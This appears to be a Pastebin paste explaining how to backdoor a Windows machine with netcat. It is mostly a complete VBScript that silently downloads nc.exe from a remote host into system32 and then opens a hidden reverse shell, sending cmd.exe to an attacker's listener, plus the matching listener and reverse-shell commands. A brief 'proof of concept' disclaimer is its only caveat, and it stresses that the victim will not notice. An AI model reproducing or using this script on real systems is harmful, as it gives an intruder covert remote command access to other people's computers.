API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 23rd, 2017
239
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.54 KB | None | 0 0
raw download clone embed print report
  1. https://joncraton.org/blog/46/netcat-for-windows/
  2.  
  3. Download nc111nt.zip (password:nc) - Netcat for Windows
  4.  
  5. Create a backdoor into a Windows system
  6. Using VBScript and netcat it is quite simple to create a basic backdoor into a users system with the priviledges of the user that ran the script. It's a very basic concept and all it does it download the netcat program (nc.exe) from a trusted website into the users c:\windows\system32 folder. What this does is allow you to run netcat from the command line without dealing with the full location of nc.exe. Once the file is in the system32 folder it can simple be run from any command prompt.
  7.  
  8. ***This is a proof of concept and should not be used for illegal purposes. Only use this in your own test environment and I take no responsibility if you mess something up with this***
  9.  
  10. To set this up, you need to have a computer running netcat waiting for the incomming connection. To do that just run a simple command such as:
  11.  
  12. nc -l 1337
  13. That's when we tell the script to run the following netcat command:
  14.  
  15. nc -d 10.0.0.8 1337 -e cmd.exe
  16. What this does is tell netcat to connect to the IP 10.0.0.8 on TCP port 1337. The -e switch tells netcat to execute cmd.exe and output it to the server waiting for the connection. The -d switch tells netcat to run in the background in a Windows environment. The user won't even know it's running without checking the process list.
  17.  
  18. Here's an example script that will automatically download nc.exe, write it to c:\windows\system32 and then execute the netcat command to connect to the remote server:
  19.  
  20. ' Set your settings
  21. strFileURL = "http://10.0.0.10/nc.exe"
  22. strHDLocation = "C:\WINDOWS\system32\nc.exe"
  23.  
  24. ' Fetch the file
  25. Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
  26.  
  27. objXMLHTTP.open "GET", strFileURL, false
  28. objXMLHTTP.send()
  29.  
  30. If objXMLHTTP.Status = 200 Then
  31. Set objADOStream = CreateObject("ADODB.Stream")
  32. objADOStream.Open
  33. objADOStream.Type = 1 'adTypeBinary
  34.  
  35. objADOStream.Write objXMLHTTP.ResponseBody
  36. objADOStream.Position = 0 'Set the stream position to the start
  37.  
  38. Set objFSO = Createobject("Scripting.FileSystemObject")
  39. If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
  40. Set objFSO = Nothing
  41.  
  42. objADOStream.SaveToFile strHDLocation
  43. objADOStream.Close
  44. Set objADOStream = Nothing
  45. End if
  46.  
  47. Set objXMLHTTP = Nothing
  48.  
  49. Set objShell = CreateObject("WScript.Shell")
  50.  
  51. ' Execute the connection
  52. objShell.Exec("nc -d 10.0.0.8 1337 -e cmd.exe")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!